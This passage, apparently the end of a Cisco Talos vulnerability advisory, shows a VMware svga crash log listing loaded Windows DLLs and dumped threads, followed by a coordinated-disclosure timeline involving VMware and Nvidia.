2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x000cc0a9 timestamp 0xa1206fe7
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\dnsapi.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4f850000 size 0x0x00008000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x0000c1ee timestamp 0x7ace72dc
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\nsi.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4b120000 size 0x0x0003d000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x0003b254 timestamp 0x55458551
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\IPHLPAPI.DLL
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb3f620000 size 0x0x0000a000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x0000ec91 timestamp 0x389781ac
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\rasadhlp.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4f230000 size 0x0x000a2000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x000a9f48 timestamp 0xaaba4fa9
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\clbcatq.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 2001.12.10941.16384
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb3e740000 size 0x0x00011000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x0000bb8c timestamp 0x80ed95b9
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\wbem\wbemprox.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb3f200000 size 0x0x00085000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x000821c7 timestamp 0x264de62a
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\wbemcomn.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb39630000 size 0x0x00014000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x00015c08 timestamp 0x42167f4e
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\wbem\wbemsvc.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb39650000 size 0x0x000f1000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x000f6195 timestamp 0xc27bfeee
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\wbem\fastprox.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4f0e0000 size 0x0x00008000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x00009082 timestamp 0x43f78f9f
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\psapi.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb39250000 size 0x0x001ed000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x001d72c0 timestamp 0x05f0e9a4
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\dbghelp.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4ef30000 size 0x0x0016a000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x001780ac timestamp 0x6c634a1d
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\msctf.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4b640000 size 0x0x00058000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x0005f200 timestamp 0xd1e21847
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\winsta.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb40320000 size 0x0x00066000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x00061b53 timestamp 0x9ff9e1ff
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\SensorsApi.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.168
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb40300000 size 0x0x0001e000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x00021e5c timestamp 0xbbb5f881
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\SensorsUtilsV2.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb40210000 size 0x0x00024000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x00023855 timestamp 0xabdcae8a
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\SensorsNativeApi.V2.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb486b0000 size 0x0x001a8000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x001acb40 timestamp 0x8ccb846c
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\propsys.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 7.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb227e0000 size 0x0x00030000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x00032b59 timestamp 0x91d63955
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\PortableDeviceTypes.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb40070000 size 0x0x00036000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x0003e09f timestamp 0x2c0d51d2
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\deviceaccess.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4cce0000 size 0x0x00058000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x00063cc0 timestamp 0xefa740e2
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\wintrust.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4a510000 size 0x0x0002e000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x000380b6 timestamp 0xb90c6519
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\dwmapi.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4d7d0000 size 0x0x0001d000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x000270f8 timestamp 0x00e30045
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\imagehlp.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb3f970000 size 0x0x000ad000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x000a8b32 timestamp 0x700dafec
2019-02-05T15:24:22.748+01:00| svga| I125: image file C:\Windows\System32\mscms.dll
2019-02-05T15:24:22.748+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.748+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4bac0000 size 0x0x00028000
2019-02-05T15:24:22.748+01:00| svga| I125: checksum 0x0002961f timestamp 0xbbcbf3a2
2019-02-05T15:24:22.749+01:00| svga| I125: image file C:\Windows\System32\userenv.dll
2019-02-05T15:24:22.749+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: including module base 0x0x7ffb3f960000 size 0x0x00010000
2019-02-05T15:24:22.749+01:00| svga| I125: checksum 0x0000eeb8 timestamp 0xb5672678
2019-02-05T15:24:22.749+01:00| svga| I125: image file C:\Windows\System32\ColorAdapterClient.dll
2019-02-05T15:24:22.749+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: including module base 0x0x7ffb3c650000 size 0x0x00043000
2019-02-05T15:24:22.749+01:00| svga| I125: checksum 0x0004a1f9 timestamp 0xa5d2ba3f
2019-02-05T15:24:22.749+01:00| svga| I125: image file C:\Windows\System32\icm32.dll
2019-02-05T15:24:22.749+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: including module base 0x0x7ffb48ec0000 size 0x0x0027e000
2019-02-05T15:24:22.749+01:00| svga| I125: checksum 0x0028c849 timestamp 0x13a31007
2019-02-05T15:24:22.749+01:00| svga| I125: image file C:\Windows\System32\d3d11.dll
2019-02-05T15:24:22.749+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4a920000 size 0x0x000c2000
2019-02-05T15:24:22.749+01:00| svga| I125: checksum 0x000c506d timestamp 0x6b3e2414
2019-02-05T15:24:22.749+01:00| svga| I125: image file C:\Windows\System32\dxgi.dll
2019-02-05T15:24:22.749+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: including module base 0x0x7ffb461e0000 size 0x0x000ec000
2019-02-05T15:24:22.749+01:00| svga| I125: checksum 0x000f0451 timestamp 0x5c1791f2
2019-02-05T15:24:22.749+01:00| svga| I125: image file C:\Windows\System32\DriverStore\FileRepository\nv_dispwi.inf_amd64_55833c8e0c46d698\nvldumdx.dll
2019-02-05T15:24:22.749+01:00| svga| I125: file version 24.21.14.1216
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: including module base 0x0x7ffb47510000 size 0x0x0000a000
2019-02-05T15:24:22.749+01:00| svga| I125: checksum 0x000100e7 timestamp 0xb11b88e5
2019-02-05T15:24:22.749+01:00| svga| I125: image file C:\Windows\System32\version.dll
2019-02-05T15:24:22.749+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: including module base 0x0x7ffb40b40000 size 0x0x0259e000
2019-02-05T15:24:22.749+01:00| svga| I125: checksum 0x025a382d timestamp 0x5c179b8c
2019-02-05T15:24:22.749+01:00| svga| I125: image file C:\Windows\System32\DriverStore\FileRepository\nv_dispwi.inf_amd64_55833c8e0c46d698\nvwgf2umx_cfg.dll
2019-02-05T15:24:22.749+01:00| svga| I125: file version 24.21.14.1216
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: including module base 0x0x7ffb39220000 size 0x0x0002a000
2019-02-05T15:24:22.749+01:00| svga| I125: checksum 0x0003488c timestamp 0x590c013e
2019-02-05T15:24:22.749+01:00| svga| I125: image file C:\Windows\System32\dbgcore.dll
2019-02-05T15:24:22.749+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 5176
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 4932
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 13120
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 10196
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 9616
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 12008
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 452
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 3672
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 7452
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 7556
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 8892
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 4312
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 1284
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 3564
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 2444
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 9552
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 13864
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 13168
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 11484
2019-02-05T15:24:22.749+01:00| svga| I125: CoreDump: Including thread 9536
2019-02-13 - Vendor disclosure; Reported to VMware
2019-04-08 - Coordination between Nvidia & VMware began
2019-05-23 - Disclosure deadline extended
2019-08-02 - Vendor Patched; Public Release
Discovered by Piotr Bania of Cisco Talos.